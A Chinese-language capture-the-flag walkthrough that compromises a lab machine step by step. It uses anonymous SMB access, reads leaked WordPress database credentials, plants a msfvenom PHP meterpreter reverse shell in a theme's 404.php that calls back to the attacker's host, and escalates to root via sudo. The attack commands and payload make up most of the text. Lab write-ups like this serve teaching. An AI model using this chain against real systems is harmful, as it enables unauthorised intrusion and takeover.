标签:txt deets 192.168 CTF wordpress 223.168 php 泄露 SMB
kali:192.168.223.131
target:192.168.223.168
通过arp-scan扫出ip为192.168.223.168,再通过nmap扫描
nmap -sV 192.168.223.168
通过nmap扫描,发现开放22、80,其中139和445都是Samba服务器,3306是Mysql和6667端口
使用smbclient尝试连接
smbclient -L 192.168.223.168
发现没有密码,有print$、share$、IPC$,尝试连接share$
smbclient '\\192.168.223.168\share$'
直接Enter发现直接进去了,无密码
看一下里面的deets.txt文件
get deets.txt
开一个新终端打开deets.txt,里面找到密码为12345
通过观察smb服务器发现有wordpress,推测是网站目录,进入wordpress后找到wordpress的配置文件
get wp-config.php
在新的终端打开该文件,为数据库的连接文件,找到账号密码为Admin和TogieMYSQL12345^^
到这里没什么头绪了,对网站进行目录扫描
dirb http://192.168.223.168
扫出wordpress/wp-admin,尝试用上面获得的账号密码进行登陆,进入后台,在Appearance的Editor里面,发现可以编辑php文件
通过msf生成php木马,将其复制到对方的404页面的php文件中
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.131 lport=4444 -f raw > /shell.php
打开监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.223.131
set lport 4444
exploit
找到404页面,通过安装CMS获得地址,并运行,此时目标上线
192.168.223.168/wordpress/wp-content/themes/twentyfifteen/404.php
美化一下界面并看一下用户有哪些
python -c 'import pty;pty.spawn("/bin/bash")'
cat /etc/passwd
找到有一个叫togie的用户,在home目录下,根据之前的deets.txt中获得密码进行提权
su togie
//12345
查看用户权限发现是三个ALL,直接提权至root
sudo -l
sudo su
然后在root目录下获取目标文件
标签:txt,deets,192.168,CTF,wordpress,223.168,php,泄露,SMB 来源: https://www.cnblogs.com/icui4cu/p/16123308.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。